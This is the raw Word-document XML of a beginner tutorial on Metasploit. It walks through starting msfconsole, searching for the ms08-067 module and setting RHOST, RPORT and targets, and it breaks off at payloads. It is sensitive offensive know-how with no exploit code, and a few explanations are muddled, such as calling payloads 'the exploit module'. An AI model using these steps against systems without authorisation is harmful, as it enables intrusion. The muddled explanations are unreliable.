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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">💕</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>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03">
      <w:pPr>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Starting Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">First, start with the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service postgresql start</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you can start </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgresQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database and be able to store the information you collect during your tests. After starting PostgresQL, you can start Metasploit with the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</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05">
      <w:pPr>
        <w:jc w:val="center"/>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4581525" cy="4953000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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81525" cy="49530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007">
      <w:pPr>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Metasploit Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">rapid7</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> Vulnerability and Exploit Database</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can access the Metasploit Modules Database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another option is to search on Metasploit search function itself, by typing the vulnerability </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE ID</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For example, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search ms08-067</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="23241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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To see more information regarding the vulnerability, use the command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the full location of the vulnerability that was shown when using the command search. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:jc w:val="both"/>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5731200" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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7312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both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After choosing a module and configuring it, you will use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:jc w:val="center"/>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3019425" cy="209550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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019425" cy="20955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011">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring Module Options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> show options </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to check the exploit module options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:jc w:val="both"/>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5731200" cy="1397000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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73120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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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RHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBPIPE</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: remote host that we’re exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ip address] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: target port that we’re going to exploit. Some exploits already have a port set by default. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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set RPORT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[port number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBPIPE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The SMB pipes allow communication between the operational system processes, through a network. Those are also defined by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Target operational system and version. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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show targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="216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Shows the available targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>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set target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="216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Sets a target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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20">
      <w:pPr>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Payloads (or Shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads are the exploit module. It’s necessary to configure a payload that will be executed after the exploit has been done. Use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show payloads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
